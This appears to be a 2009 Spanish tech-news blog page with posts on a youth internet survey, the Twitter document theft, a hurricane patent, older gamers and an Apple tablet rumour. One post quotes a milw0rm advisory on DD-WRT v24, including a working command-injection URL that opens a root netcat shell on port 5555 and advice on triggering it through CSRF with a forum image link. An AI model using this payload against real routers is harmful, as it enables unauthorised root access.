martes, 28 de julio de 2009

El 25% de los jóvenes tiene citas a ciegas a través de Internet

Alrededor del 25 por ciento de los adolescentes y jóvenes de entre 15 y 25 años ha quedado al menos alguna vez con un desconocido por Internet, mientras que el 77.2 por ciento no lo ha hecho nunca, según una encuesta publicada por el Injuve, un organismo dependiente del Ministerio de Igualdad.

Esta investigación, denominada "Adolescentes y jóvenes en la red; factores de oportunidad", ha incorporado una muestra de 1,111 encuestas realizadas a un colectivo de entre 15 y 25 años de edad.

Su presentación en rueda de prensa ha corrido a cargo del director general del Instituto de la Juventud (Injuve), Gabriel Alconchel, y de Angeles Rubio, profesora de la Universidad Rey Juan Carlos y doctora en Comercialización y Estudios de Mercado.

Según los datos, el 9.8% de los jóvenes y adolescentes encuestados dice que no queda "casi nunca" con personas desconocidas anteriormente contactadas en la red, el 5.4% lo hace "muy pocas veces"; el 4.4% "regularmente"; el 1% "habitualmente", y el 2.2%, "siempre".

Internet es "la ventana al mundo" para la mayoría de los jóvenes y adolescentes, un colectivo que accede habitualmente a páginas "web" en un porcentaje del 96%, "porque forma parte de su ADN, prácticamente", y aunque los riesgos de ese fenómeno pueden suponer una especie de "gruta" oscura, las ventajas de esta tecnología son mucho mayores que sus peligros, tal como confirman los datos.

De acuerdo a los resultados de esta investigación, el colectivo entrevistado manifiesta gran rechazo ante aquellos contenidos en la red relacionados con delitos sexuales, el 39.5%, mientras que ese rechazo es inferior en lo relativo a imágenes denigrantes (24%), violencia (22.5%), y el bullying y los comentarios humillantes (20%).

A continuación, se sitúa el rechazo de este colectivo ante contenidos que puedan generar información falsa o tendenciosa (por ejemplo, el 19.2% al peligro de las sectas), la intromisión en la vida privada (problemas de pareja, el 12.3%) o la práctica de cibersexo (13.5%).

El tema de "las adicciones" es el principal riesgo de Internet, según la percepción de los jóvenes, con un porcentaje del 46.9%, pero las páginas "web" relacionadas con aquéllas son las menos visitadas por el colectivo de entre 15 y 25 años: los juegos "on line", el 10.9%; el cibersexo, el 7.9%; los "chats", el 6.9%, y las apuestas "on line", el 2.2%.

Otro de los grandes peligros de Internet, es decir, lo que podría considerarse como "la gran cueva" de la red, según los responsables de la investigación, tiene que ver con "la ligereza" con la que se interpretan a menudo los datos "on line", puesto que "no se suelen poner en tela de juicio, dándose erróneamente todo por válido".

Del estudio se desprende además que la brecha en el acceso a Internet por parte de los chicos respecto a las chicas va desapareciendo; además, sólo el 3.4 por ciento del colectivo de entre 15 y 25 años no accede nunca a la red.

El 52% no compra nunca por Internet y el 80% de los internautas de entre 15 y 25 años se conecta desde casa, de acuerdo a datos de 2008, algo impensable diez años antes, cuando esa tasa era del 34%, según Rubio.

El 67% de los internautas entrevistados accede a páginas de Internet para su aprendizaje y el 89% para adquirir información; el 85%, para el acceso a productos culturales; el 79.9%, para divertirse; el 80%, para relaciones sociales, y el 58%, por motivos laborales y oportunidades de trabajo.

El 36% del colectivo entrevistado accede a Internet en soledad, mientras que el 61% lo hace acompañado, habitualmente con amigos.


lol

Problema de seguridad en el firmware para routers DD-WRT

Se ha descubierto un error de validación de parámetros de entrada en el interfaz web de DD-WRT v,24. Esto podría ser usado por un atacante remoto sin autenticar para eludir restricciones a través de una URL especialmente manipulada. Este error permite ejecutar comandos del sistema con privilegios de "root".

DD-WRT es un firmware no oficial para routers como Linksys, D-Link y La Fonera, entre otros. Está traducido a más de diez idiomas y es compatible con IPv6, soporta WIFI con distintos tipos de cifrado, permite montar VPN y hasta tiene una versión con VoIP, entre otros tantos servicios típicos de un router.

Este fallo se ha publicado en forma de exploit con todo lujo de detalles (incluso existe un vídeo). El exploit permite lanzar una consola por el puerto 5555 del router.

Por suerte, el interfaz solo está habilitado para la red local salvo que se active para acceder a él de forma remota. La vulnerabilidad ha sido reconocida y ya existe un parche para solucionar este fallo.

Más Información:

Web oficial de DD-WRT
http://www.dd-wrt.com/dd-wrtv3/index.php

Descarga del parche
http://www.dd-wrt.com/dd-wrtv2/down.php

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
at the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;


......... (snip)............

899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s/tmp/shellout.asp");

........... (snip)..........

926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;

------------

3) issue 3: httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM


Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)

# milw0rm.com [2009-07-20]

domingo, 19 de julio de 2009

iPhone 3GS, primera toma de contacto

Le roban los datos a Twitter por un "pasword"


Twitter ha sido esta semana víctima de un pirata informático que ha robado cientos de documentos, hasta 300, de la popular red social y los ha remitido a diferentes empresas de Internet.

Una de estas empresas,
TechCrunch, ha publicado -tras un debate sobre la conveniencia o no de hacerlo- parte del material sustraído, entre los que figuran documentos corporativos sobre sus empleados, números de teléfono y currículos.

Entre la documentación robada y enviados a la mencionada web de noticias de tecnología TechCrunch, la cual ha desvelado sólo aquellos datos que han considerado que por "su valor noticioso era apropiado publicar ", según aseguró Michael Arrington, fundador y coeditor de esta publicación.

La información recolectada también refleja las expectativas en cuanto a usuarios de Twitter, que esperan sumar más de 25 millones para final de año. Y a número de empleados. Para 2013, la compañía espera llegar a 5.200 empleados, sumar 1.000 millones de usuarios, 1.540 millones de dólares de ingresos y 1.100 millones de ganancias netas, según ha informado el diario económico Cinco Días.

Según la
BBC, el hacker -conocido como ´Hacker Croll´- sería de origen francés y presumiblemente accedió a la información adivinando la contraseña de un empleado de Twitter hace un mes. En este sentido, Robin Wauters, uno de los empleados de Techcrunch ha revelado en su blog que una de las contraseñas utilizadas por los trabajadores de la red social para entrar en su servidor era literalmente ´password´.

Via
20minutos

Bill Gates quiere patentar sistema anti-huracanes


Lo dicho, es sabido que el comportamiento de los huracanes se ve afectado según la temperatura de las aguas marítimas; cuando el huracán se adentra a una zona de aguas frías el mismo disminuye su fuerza y por el contrario, si el huracán se adentra a zonas de mayor temperatura cobra mayor intensidad.

No soy experto en huracanes pero esta noticia me llamó la atención, la leí en
La Gaceta donde informan que ésto será financiado por Bill Gates con la intención de vender seguros contra huracanes, ésta solicitud de patente está firmada por 12 científicos donde la mayoría de ellos son físicos e investigadores del estado de Washington, donde precisamente es el lugar sede de la empresa Intellectual Venture Lab.


Dicha empresa es un laboratorio de inventos y ha sido fundada por directivos de Microsoft.


La explicación breve de la patente es incluir una fota de barcazas, que estarían bombeando agua fría desde el fondo del mar hacia la superficie y por ende, el enfriamiento de la zona creando una especie de pared de líquido frío que anule o disminuya la fuerza del huracán antes de llegar a tierra.


Espero que el enfriamiento artificial de las zonas marítimas no afecte a la flora y fauna marítima ya que en vez de proteger al planeta, lo estarían destruyendo...


Hasta la próxima.


viernes, 17 de julio de 2009

Los jugadores mayores de 55 años son los que más horas dedican a videojuegos

Los jugadores mayores de 55 años son el grupo de población que más horas dedica a los videojuegos porque disponen de más tiempo de ocio o tienen menos presión laboral y conforme avanza la edad pierden interés por los juegos de acción y estrategia en favor de los educativos o puzzles.

Son algunas de las conclusiones del estudio “Hábitos e iniciación a los videojuegos de los mayores de 35 años” promovido por la Asociación de Videojugadores y realizado por la Universidad Complutense de Madrid, basado en 974 encuestas a hombres y mujeres con edad superior a 35 años.

Aunque son los jóvenes los principales usuarios de los videojuegos (entre el 80 y el 90 por ciento los utilizan), los mayores de 55 años son los que más tiempo dedican a jugar con ellos.

Dedican más de tres horas al día, el 80 por ciento de los jugadores adultos de entre 55 y 64 años, la mitad de los mayores de 65 años y los de entre 45 y 54 años y el 43 por ciento de los que tienen entre 35 y 44 años.

Según el informe, una de cada cuatro personas de entre 35 y 44 años se divierte habitualmente con los videojuegos y los mayores de 65 años lo hace por lo menos una vez a la semana.

“Los videojuegos son cada vez más sencillos y los mayores no quieren perder el tren ni la oportunidad de compartir el ocio con sus hijos o nietos”, ha asegurado el presidente de la Asociación de Desarrolladores de Ocio Interactivo Digital (DOID), Ramón Nafria, encargado de la presentación del estudio.

PUZZLES Y JUEGOS EDUCATIVOS

Respecto a los géneros favoritos, las mujeres -el 40 por ciento de los usuarios de videojuegos- prefieren los de puzzles, infantiles, educativos y de deportes, porque los consideran más adecuados para compartir este tiempo de ocio con los hijos y nietos y también “los que les hacen pensar”, explica Nafria.

El PC es la plataforma a la que dedican más tiempo las personas de entre 35 y 44 años, mientras que los mayores de 65 años se decantan mayoritariamente por la Wii.

Sobre la forma de iniciarse, las personas de entre 35 y 44 ya jugaban desde la juventud, los de 45 a 54 les han enseñado los hijos y a los mayores de 55 otros familiares.

También existen diferencias respecto a lo que buscan con el juego, los de 35 hasta 65 entretenimiento y los mayores de esa edad compartir el ocio con la familia.

Al menos juegan una vez a la semana, el 61,9 por ciento de las personas entre 35 y 44 años; el 41 por ciento de entre 44 y 55 años; el 18,9 de entre 55 y 65 años y el 23,7 por ciento de los mayores de 65 años.

LOS MÁS ‘JUGONES’

Según el responsable del estudio, los principales usuarios de los videojuegos viven en Valencia, Madrid y Barcelona, mientras que no se perciben grandes diferencias respecto al resto de los habitantes en otras localidades, independientemente de que residan en ciudades o zonas rurales.

Los principales productos consumidos son Wii (Wii Play, Wii Fit y Mario Kart), de Nintendo (Brain Training, New Super Mario Bos y Smash Bros Brawl), la última entrega de GTA y Pro Evolution Soccer de Paystetion 2, según la asociación DOID.

Otra de las conclusiones del informe es que los españoles emplean con asiduidad los contenidos digitales.

El 67 por ciento no podría vivir sin Internet, lo que supera a los que afirman que no podrían vivir sin coche, que son el 51 por ciento.

Nueve de cada diez hombres dicen que la actividad en la que más tiempo invierten es visualizar vídeos en Internet, mientras que las mujeres, en un 80 por ciento, se interesan por participar en juegos individuales.



martes, 14 de julio de 2009

Netbook tactil de Apple


Parece ser que Apple dio ordenes de fabricación de un misterioso dispositivo que traería una pantalla táctil de 9.7 pulgadas y supuestamente saldría con un precio de alrededor de 800 dólares.

Esta sería la nueva Netbook tactil de Apple que sin duda sería de una las noticias bomba del año y una revolución segura en los netbooks.

Vía: gizig

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)